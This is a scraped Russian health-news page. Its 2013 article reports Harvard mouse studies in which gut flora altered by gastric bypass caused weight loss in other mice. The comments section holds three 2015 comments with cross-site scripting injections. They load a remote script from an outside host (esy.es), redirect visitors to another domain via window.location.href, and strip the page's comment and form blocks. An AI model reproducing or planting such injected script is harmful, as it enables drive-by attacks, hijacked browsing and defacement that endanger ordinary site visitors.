Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Бактерии спасут человечес...  >>  Бактерии спасут человечество от ожирения! Новый метод похудения от гарвардских ученых
 
Обратная связь
 

Бактерии спасут человечество от ожирения! Новый метод похудения от гарвардских ученых

Размер шрифта
29 мая 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые из Гарварда на грани открытия революционного метода похудения.

Выяснилось, что желудочное шунтирование у мышей приводит к изменениям их кишечной флоры таким образом, что если перенести ее в кишечник неоперированных мышей, последние начинали худеть.

«Это просто поразительно», – говорит Питер Тарнбо, один из ведущих авторов исследования. «Просто колонизируя кишечник мышей измененной флорой, мы смогли добиться серьезнейшей потери веса у них – примерно на 20% от того, что можно было бы достичь с помощью желудочного шунтирования».

«Наша работа позволяет сделать вывод, что одним из эффектов желудочного шунтирования является особое влияние на кишечные бактерии. И разработка методик, имитирующих это влияние, может стать важной вехой в борьбе с ожирением», – утверждает Ли Каплан, директор института Ожирения, Метаболизма и Питания в Массачусеттсе.

«Поэтому нам нужно более плотно приблизиться к пониманию механизмов этого явления, чтобы в будущем их воспроизвести», – добавляет он. «Если нам это удастся, мы зададим новые горизонты в этом направлении и сможем помочь пациентам, которые не могут или не хотят ложиться под нож».

Не все сразу

Безусловно, результаты впечатляют, но Тарнбо спешит предостеречь: пройдут годы, прежде чем аналогичное исследование проведут на людях. И его нельзя рассматривать, как повод отлынивать от спортзала в попытке сбросить 5 килограмм после новогодних праздников. Эта методика даст надежду людям, для которых лишний вес представляет собой серьезную угрозу здоровью и которые хотят похудеть, не прибегая к травматичной операции.

Исследователи отмечают, что и раньше знали о том, что состав кишечной флоры меняется после желудочного шунтирования, но скорость и объем этих изменений превзошли все их ожидания. Это натолкнуло их на мысль, что суть происходящего объясняется не только и не столько количественным составом кишечной микрофлоры.

«Возможно, что эти изменения обусловлены не микробами как таковыми, а продуктами, которые они выделяют», – утверждает Тарнбо. «В частности, в ходе эксперимента мы обнаружили изменения в содержании короткоцепочечных жирных кислот в организме мышей. Эти молекулы могут действовать как пусковые механизмы для метаболизма, вынуждая его ускоряться и не накапливать лишние калории».

Тарнбо и Каплан полны решимости продолжать работы в данном направлении.

«Конечно, результаты подобных исследований не могут не радовать людей с избыточным весом», – говорит Каплан. «Ведь чем больше мы разбираемся в этой теме, тем очевиднее становится тот факт, что в появлении избыточного веса играет роль огромное количество факторов, а не только физическая нагрузка и питание».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:17

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:33

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:16

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
7 чудес талой воды   Всемирная неделя первичного иммунодефицита начинается в Москве!   Беременность: как обезопасить себя и будущего малыша от вирусов   С какого возраста малышам можно давать иммуномодуляторы?  
03 октября 2013Результаты благотворительного марафона «Всем миром» 08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты
 
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 12 июня 2013Обычный шум может вызвать остановку сердца! Как избежать этого?
 

Слайдшоу

1
Можно ли пережить беременность без рвоты?
Убийцы в вашей ванной
Можно ли подгадать с беременностью?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.